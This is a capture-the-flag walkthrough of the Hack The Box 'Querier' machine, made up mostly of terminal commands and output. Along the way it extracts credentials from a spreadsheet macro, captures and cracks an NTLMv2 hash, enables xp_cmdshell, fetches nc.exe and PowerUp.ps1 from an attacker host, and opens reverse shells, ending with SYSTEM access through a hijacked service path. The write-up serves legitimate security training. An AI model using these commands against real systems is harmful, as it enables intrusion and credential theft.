Date & Time
Jan 27, 2024 12:59 AM
Author
J
Joseph Jee
Walkthrough
Gaining a Foothold
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -p- -A -Pn 10.129.28.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 15:38 EST
Warning: 10.129.28.225 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.28.225
Host is up (0.59s latency).
Not shown: 65413 closed tcp ports (conn-refused), 108 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.129.28.225:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.28.225:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
|_ssl-date: 2024-01-19T21:35:07+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T20:36:19
|_Not valid after: 2054-01-19T20:36:19
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-01-19T21:34:57
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3391.46 seconds┌──(kali㉿kali)-[~]
└─$ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.28.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 18:32 EST
Nmap scan report for 10.129.28.225
Host is up (0.60s latency).
Bug in ms-sql-hasdbaccess: no string output.
Bug in ms-sql-dac: no string output.
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-empty-password:
|_ 10.129.28.225:1433:
| ms-sql-config:
| 10.129.28.225:1433:
|_ ERROR: Bad username or password
| ms-sql-ntlm-info:
| 10.129.28.225:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ms-sql-dump-hashes:
|_ 10.129.28.225:1433: ERROR: Bad username or password
| ms-sql-info:
| 10.129.28.225:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-xp-cmdshell:
|_ (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
| ms-sql-tables:
| 10.129.28.225:1433:
|_[10.129.28.225:1433]
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.92 secondsSMB
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ smbclient -L \\\\10.129.28.225\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.28.225 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ smbclient \\\\10.129.28.225\\Reports
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 28 18:23:48 2019
.. D 0 Mon Jan 28 18:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 17:21:34 2019
5158399 blocks of size 4096. 845273 blocks available
smb: \> mget *
Get file Currency Volume Report.xlsm?Possible user
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ olevba 'Currency Volume Report.xlsm'
olevba 0.60.2dev1 on Python 2.7.18 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' macro to pull data for client volume reports
'
' further testing required
Private Sub Connect()
Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
If conn.State = adStateOpen Then
' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close
End If
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open |May open a file |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
/usr/local/lib/python2.7/dist-packages/msoffcrypto/method/ecma376_agile.py:8: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends import default_backend
That was the user id and password
Uid=reporting;Pwd=PcwTWTHRwryjc$c6
Binwalk
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ binwalk 'Currency Volume Report.xlsm'
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 367, uncompressed size: 1087, name: [Content_Types].xml
936 0x3A8 Zip archive data, at least v2.0 to extract, compressed size: 244, uncompressed size: 588, name: _rels/.rels
1741 0x6CD Zip archive data, at least v2.0 to extract, compressed size: 813, uncompressed size: 1821, name: xl/workbook.xml
2599 0xA27 Zip archive data, at least v2.0 to extract, compressed size: 260, uncompressed size: 679, name: xl/_rels/workbook.xml.rels
3179 0xC6B Zip archive data, at least v2.0 to extract, compressed size: 491, uncompressed size: 1010, name: xl/worksheets/sheet1.xml
3724 0xE8C Zip archive data, at least v2.0 to extract, compressed size: 1870, uncompressed size: 8390, name: xl/theme/theme1.xml
5643 0x160B Zip archive data, at least v2.0 to extract, compressed size: 676, uncompressed size: 1618, name: xl/styles.xml
6362 0x18DA Zip archive data, at least v2.0 to extract, compressed size: 3817, uncompressed size: 10240, name: xl/vbaProject.bin
10226 0x27F2 Zip archive data, at least v2.0 to extract, compressed size: 323, uncompressed size: 601, name: docProps/core.xml
10860 0x2A6C Zip archive data, at least v2.0 to extract, compressed size: 400, uncompressed size: 794, name: docProps/app.xml
12207 0x2FAF End of Zip archive, footer length: 22Extract
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ binwalk -e 'Currency Volume Report.xlsm'
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 367, uncompressed size: 1087, name: [Content_Types].xml
936 0x3A8 Zip archive data, at least v2.0 to extract, compressed size: 244, uncompressed size: 588, name: _rels/.rels
1741 0x6CD Zip archive data, at least v2.0 to extract, compressed size: 813, uncompressed size: 1821, name: xl/workbook.xml
2599 0xA27 Zip archive data, at least v2.0 to extract, compressed size: 260, uncompressed size: 679, name: xl/_rels/workbook.xml.rels
3179 0xC6B Zip archive data, at least v2.0 to extract, compressed size: 491, uncompressed size: 1010, name: xl/worksheets/sheet1.xml
3724 0xE8C Zip archive data, at least v2.0 to extract, compressed size: 1870, uncompressed size: 8390, name: xl/theme/theme1.xml
5643 0x160B Zip archive data, at least v2.0 to extract, compressed size: 676, uncompressed size: 1618, name: xl/styles.xml
6362 0x18DA Zip archive data, at least v2.0 to extract, compressed size: 3817, uncompressed size: 10240, name: xl/vbaProject.bin
10226 0x27F2 Zip archive data, at least v2.0 to extract, compressed size: 323, uncompressed size: 601, name: docProps/core.xml
10860 0x2A6C Zip archive data, at least v2.0 to extract, compressed size: 400, uncompressed size: 794, name: docProps/app.xml
12207 0x2FAF End of Zip archive, footer length: 22
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ ls
'Currency Volume Report.xlsm' '_Currency Volume Report.xlsm.extracted' olevba.py
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ cd '_Currency Volume Report.xlsm.extracted/'
┌──(kali㉿kali)-[~/WPE/Querier/_Currency Volume Report.xlsm.extracted]
└─$ ls
0.zip '[Content_Types].xml' docProps _rels xl
┌──(kali㉿kali)-[~/WPE/Querier/_Currency Volume Report.xlsm.extracted]
└─$ cd xl
┌──(kali㉿kali)-[~/WPE/Querier/_Currency Volume Report.xlsm.extracted/xl]
└─$ ls
_rels styles.xml theme vbaProject.bin workbook.xml worksheets
┌──(kali㉿kali)-[~/WPE/Querier/_Currency Volume Report.xlsm.extracted/xl]
└─$ cat vbaProject.binSQL
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ sudo mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.129.28.225 -windows-auth
[sudo] password for kali:
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>Pull down hash
Smbserver
┌──(kali㉿kali)-[~]
└─$ cd WPE/Querier
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ mkdir share
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ smbserver.py -smb2support share share/
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedSQL> exec xp_dirtree '\\10.10.16.24\share\',1,1
subdirectory depth file
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- -----------┌──(kali㉿kali)-[~/WPE/Querier]
└─$ smbserver.py -smb2support share share/
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.28.225,49675)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User mssql-svc\QUERIER authenticated successfully
[*] mssql-svc::QUERIER:4141414141414141:bf9b7219a527e7a61868627b533f4bfb:010100000000000080c3c1583e4bda01ff8af87b9e31bec100000000010010006a00450053004a0051006b004a005000020010004d004c0057007a007100760073005800030010006a00450053004a0051006b004a005000040010004d004c0057007a0071007600730058000700080080c3c1583e4bda010600040002000000080030003000000000000000000000000030000040df1e254eaaae42902f6ef2953ed37c0b13bcecd51f4d70131a1488bf8d2a7a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0032003400000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] AUTHENTICATE_MESSAGE (\,QUERIER)
[*] User \QUERIER authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:share)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.129.28.225,49675)
[*] Remaining connections []NTLMv2 Hash
Crack the password
John
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ john --format=netntlmv2 password.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568 (mssql-svc)
1g 0:00:00:03 DONE (2024-01-19 20:21) 0.2958g/s 2650Kp/s 2650Kc/s 2650KC/s correforenz..cornamuckla
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.Hashcat
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ sudo hashcat -m 5600 password.txt /usr/share/wordlists/rockyou.txt
MSSQL-SVC::QUERIER:4141414141414141:bf9b7219a527e7a61868627b533f4bfb:010100000000000080c3c1583e4bda01ff8af87b9e31bec100000000010010006a00450053004a0051006b004a005000020010004d004c0057007a007100760073005800030010006a00450053004a0051006b004a005000040010004d004c0057007a0071007600730058000700080080c3c1583e4bda010600040002000000080030003000000000000000000000000030000040df1e254eaaae42902f6ef2953ed37c0b13bcecd51f4d70131a1488bf8d2a7a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0032003400000000000000000000000000:corporate568Escalating Privilege
SQL session as mssql-svc
┌──(kali㉿kali)-[~/WPE/Querier]
└─$ sudo mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.129.28.225 -windows-auth
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> dir c:\
[-] ERROR(QUERIER): Line 1: Incorrect syntax near '\'.
SQL> xp_cmdshell dir c:\
output
--------------------------------------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is 35CB-DA81
NULL
Directory of c:\
NULL
09/15/2018 07:19 AM <DIR> PerfLogs
01/28/2019 11:55 PM <DIR> Program Files
01/29/2019 12:02 AM <DIR> Program Files (x86)
01/28/2019 11:23 PM <DIR> Reports
01/28/2019 11:41 PM <DIR> Users
01/29/2019 06:15 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 3,458,166,784 bytes free
NULLUpload nc.exe and get a reverse shell
NULL
SQL> xp_cmdshell powershell -c Invoke-WebRequest "http://10.10.16.24/nc.exe" -OutFile "C:\Reports\nc.exe"
output
--------------------------------------------------------------------------------
NULL
**Set up listener on port 4444**
SQL> xp_cmdshell C:\Reports\nc.exe 10.10.16.24 4444 -e cmd.exe┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.28.225] 49677
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
querier\mssql-svcMake sure you web server is running at the location of PowerUp.ps1
Make sure Invoke-AllChecks is added to the last line of the PowerUp.ps1
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24:80/PowerUp.ps1') | powershell -noprofile -
c:\Reports>echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24:80/PowerUp.ps1') | powershell -noprofile -
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24:80/PowerUp.ps1') | powershell -noprofile -
Privilege : SeImpersonatePrivilege
Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 1928
ProcessId : 916
Name : 916
Check : Process Token Privileges
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
Name : UsoSvc
Check : Modifiable Services
ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
UnattendPath : C:\Windows\Panther\Unattend.xml
Name : C:\Windows\Panther\Unattend.xml
Check : Unattended Install Files
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check : Cached GPP FilesChange the binary path (of service being run as admin) to get a reverse shell
//Query the service
c:\Reports>sc qc UsoSvc
sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs -p
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
//Make it pop a reverse shell
c:\Reports>sc config UsoSvc binpath= "C:\Reports\nc.exe 10.10.16.24 5555 -e cmd.exe"
sc config UsoSvc binpath= "C:\Reports\nc.exe 10.10.16.24 5555 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
//Make sure it is changed accoridngly
c:\Reports>sc qc UsoSvc
sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Reports\nc.exe 10.10.16.24 5555 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
//Stop the service
c:\Reports>sc stop UsoSvc
sc stop UsoSvc
SERVICE_NAME: UsoSvc
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x3
WAIT_HINT : 0x7530
//Have the listener ready on port 5555
c:\Reports>sc start UsoSvc
sc start UsoSvc
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.┌──(kali㉿kali)-[~]
└─$ nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.28.225] 49679
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system